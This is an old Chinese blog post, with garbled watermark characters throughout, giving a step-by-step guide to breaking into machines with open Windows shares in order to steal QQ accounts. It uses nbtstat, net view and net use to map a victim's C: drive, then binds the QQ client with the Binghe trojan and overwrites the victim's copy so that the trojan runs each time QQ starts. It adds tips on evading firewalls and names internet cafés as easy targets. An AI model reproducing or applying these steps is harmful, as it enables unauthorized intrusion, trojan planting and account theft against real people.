您的位置:我是网管博客
» 松松博客--蜘蛛网管
» 日志
入侵后偷QQ号的方法(禁)
上一篇 /
下一篇 2006-06-27 10:55:24 / 天气: 晴朗
/ 心情: 高兴
/ 个人分类:技术交流
在命令提示符下(即,win9x的dos命令行下)
$t�B.O�m�`*Y�D0输入 nbtstat -A xxx.xxx.xxx.xxx
/j�U8x�_:g�T�^�_�s�g0会得到如下提示信息:
-y�n�G�l�J�g$n�u0NetBios remote machine name table
(I5v�} Z�S3a�Y-G0name __type _________status
-{$V1n�m
K�t0clovea <00> unique registered
�a7[�D�t�}3f�~0mmxxcc <00> group registered 我是网管博客,I&K�H�p2\
clovea <03> unique registered
�p9\9\�O�|,y�^�o0mac address = 00-00-00-00-00-00
$a/{�B�v�`�x6_&v0这里就告诉了你对方的注册用户名,和主机名 均为clovea
4s1I�}�k�@�{�c�\�e*G0mmxxcc为对方注册公司。
�M�I�T�}�v�Q'].F0第三步,在命令提示符下输入,
�U.[�N.f/K;~0net view \\xxx.xxx.xxx.xxx
�p�n�x-_�i"H&F7b�f2h0这时会显示对方的共享资源。
#^�w�h2[:B�g"P0比如 我是网管博客%]
D,|0a�@�d
c xx c
*g�V�_�S&I0说明对方的c盘是共享的。
8Y6y�v)Y3E�A8v;t0第四步,接下来输入
9B�s�e�]�Z�S+I�K$p0net use z: \\xxx.xxx.xxx.xxx\c 我是网管博客�U�h�q$_
F0x�K
这时,你的z:就成为对方c盘的应像了,可以直接用dos命令操作
3r2B�A�r4o*t�E
G t0如copy z:\program files\oicq.exe d:\oicq.exe 我是网管博客
T!]�n�c�B1o*J�y;Q.W�i
也可以到windowa界面,打开我的电脑,直接操作。 我是网管博客!s1W�w$B!@-T�L.}
第5步,查明对方的常用软件,如oicq,winamp,等等
�o�k�h�_�j�@1x0然后把对方的常用软件和木马进行捆绑,如把oicq.exe 和G_sever.exe(冰河2.2服务端)。 我是网管博客9g.F:`�H�a9F2O�n�c
第6步,偷梁换柱,把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马,嘿嘿。 我是网管博客0p�t�i$m+[+B"e
E�_�}
第7步,等着你的冰河给你发mail吧,呵呵,不过大家最好还是别用冰河,冰河的万能密码太恐怖了,还有,默认的木马端口一定要记得改啊。
�R8A9`$G J0备注,如果对方拥有天网之内的防火墙的话,你是查不到对方的共享资源和信息的。
-c�U o$I�]�w0如果你已经成功的侵入,而又能肯定对方要装防火墙的话,请把木马端口限制在1024以下。 我是网管博客 b:b�f.R�V�X�P�K
以上方法虽然是利用对方的错误配置等进攻,并且懂点安全知识的都不会共享自己的资源的,但是经我实验证实,有很多网吧为了方便,硬盘都是共享了的,如果对方有路由的话,就先用ip欺骗吧!
�M3o+d�A9~0首先需要得知对方的ip
%['T9r)l*C9f�u'i$p2[0可以用oicq来查对方ip,也可以在聊天室内查。
#L�_.}�|!L0工具很多,随便都可以抓到一大把。 我是网管博客�E�e6O&N'l�g
导入论坛
引用链接
收藏
分享给好友
推荐到圈子
管理
举报
TAG:
科学技术
技术交流
